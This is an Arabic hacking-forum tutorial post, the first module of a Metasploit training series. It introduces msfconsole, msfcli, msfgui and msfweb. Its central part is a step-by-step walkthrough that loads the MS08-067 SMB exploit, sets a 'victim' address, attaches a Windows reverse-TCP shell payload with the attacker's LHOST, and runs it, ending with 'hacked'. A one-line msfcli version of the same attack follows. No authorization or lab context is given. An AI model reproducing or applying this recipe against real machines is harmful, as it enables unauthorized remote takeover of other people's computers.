module 1 : ماهي msfconsole,msfcli,msfweb,msfgui و نبذة عن الأوامر .(METASPLOIT TRANNING)

data$hack · 02-03-2010, 01:48 AM

السلام عليكم ورحمة الله وبركاته
بسم الله الرحمن الرحيم

في هذا الدرس :
ستتعرف msfconsole واوامره , كيفية العمل به
ستتعرف msfcli
ستتعرف msfgui
ستتعرف msfweb

مشروع Metasploit مشروع كبير جدا و مشهور عالميا ، بدايته كانت سنة 2003 , كان يحتوي على القليل من exploits و payloads , فبدأت عملية التطور ليصل اليوم محملا ب 496 exploits و 192 payloads و 239 auxiliary. بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow ... و الكثير الكثير

سنتحدث اكثر عن msfconsole
تعريف صغير عن البقية

-----------------------
msfconsole
-----------------------
تجدونها على باك تراك هنا :

كود PHP:

  pentest/exploits/framework3/msfconsole

ندخل الان في الاوامر :
اهم امر help
لن اشرحو هههه

امر show :

show exploits
اظهار جميع الثغرات

show payloads
اظهار جميع payload

show auxiliary
اظهار جميع auxiliary

search
للبحث ;مثال :

امر info
تعطينا معلومات ;مثال :

امر use
احنا عندنا ثغرة نريد استخدامها ،
اذا use ;مثال :

كود PHP:

  msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

اكتب show options لترى options الثغرة ;مثال :

ماذا يهمنا هنا ???
الظحية rhost
rport البورت المصاب اتركه كما هو
نظع ip الظحية set RHOST ip ;مثال :

كود PHP:

  msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2
RHOST => 192.168.1.2

الان نأتي الى المهم ال payload
باختصار هو كيفية التحكم بجهاز victim
اكتب show payloads من ثم اختر واحدا
باختصار هذه ال payload هي الاقوى :

كود PHP:

  windows/shell/reverse_tcp
windows/shell/bind_tcp
windows/vncinject/bind_tcp
windows/meterpreter/reverse_tcp

سنأتي على تعريفها في الدروس القادمة

نظع ال set payload :::payload ;مثال :

كود PHP:

  msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp

اكتب show options لترى options الثغرة again ;مثال :

هههه كبرت
شوف lhost تظع هنا ال ip تبعك ;مثال :

كود PHP:

  msf exploit(ms08_067_netapi) > set LHOST 192.168.1.3
LHOST => 192.168.1.3

كل شيء تمام

الان اكتب exploit للاستغلال ;مثال :

:icon555: :00001793[1]:

تم الاخترق

ملا حظة هامة جدا
انا استعملت ثغرة windows/smb/ms08_067_netapi
يعني انت ممكن تمشي معاك ممكن لا
استعمل ما تعلمته قبل قليل للبحث عن ثغرة تعمل
ان شاء الله استفدتوووا

-----------------------
msfcli
-----------------------

باختصار هيا للاختصار
مثال :

كود PHP:

  /pentest/exploits/framework3/msfcli windows/smb/ms08_067_netapi payload=windows/shell/reverse_tcp RHOST=192.168.1.2 LHOST=192.168.1.2 E

-----------------------
msfgui
-----------------------
للاغبياء فقط :icon666:
تشغيلها سهل :

كود PHP:

  pentest/exploits/framework3/msfgui

-----------------------
msfweb
-----------------------
الاجمل و الاروع :666:
تشغيلها سهل :

كود PHP:

  pentest/exploits/framework3/msfweb

ثم اذهب للمتصفح :

كود PHP:

  http://127.0.0.1:55555/

ان شاء الله اكون وصلت بعض المعلومات و لو القليل
ان شاء الله بتفهم اكثر مع الدروس القادمة
ارجوا من اصحاب القلوب المريضة حفض الحقوق والله تعبت عليه
best regards
data$hack

المصدر: :: vBspiders Professional Network ::

module 1 : lhid msfconsole(METASPLOIT TRANNING)

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
انواع عرض الموضوع
الانتقال إلى العرض العادي الانتقال إلى العرض المتطور العرض الشجري

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
::: METASPLOIT TRANNING ::: مقدمة , توضيحات و فهرس	data$hack	MetaSploit	212	04-26-2015 11:09 PM
[اول درس]نبذة عن الميتاسبلويت	المجهووول	MetaSploit	28	03-22-2012 01:09 AM
module 4 : ال [METERPRETER]. =>>>>>> الدرس 1 : نبذة عن الاوامر	data$hack	MetaSploit	100	01-29-2011 11:45 PM
شرح أداة الـ msfcli داخل الميتاسبلويت عوضا عن الكونسول والواجهة الرسومية	MATRIX ALGERIA	جـــ'ابات العناكــ'ب	6	04-28-2010 08:28 PM

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

module 1 : ماهي msfconsole,msfcli,msfweb,msfgui و نبذة عن الأوامر .(METASPLOIT TRANNING)

MetaSploit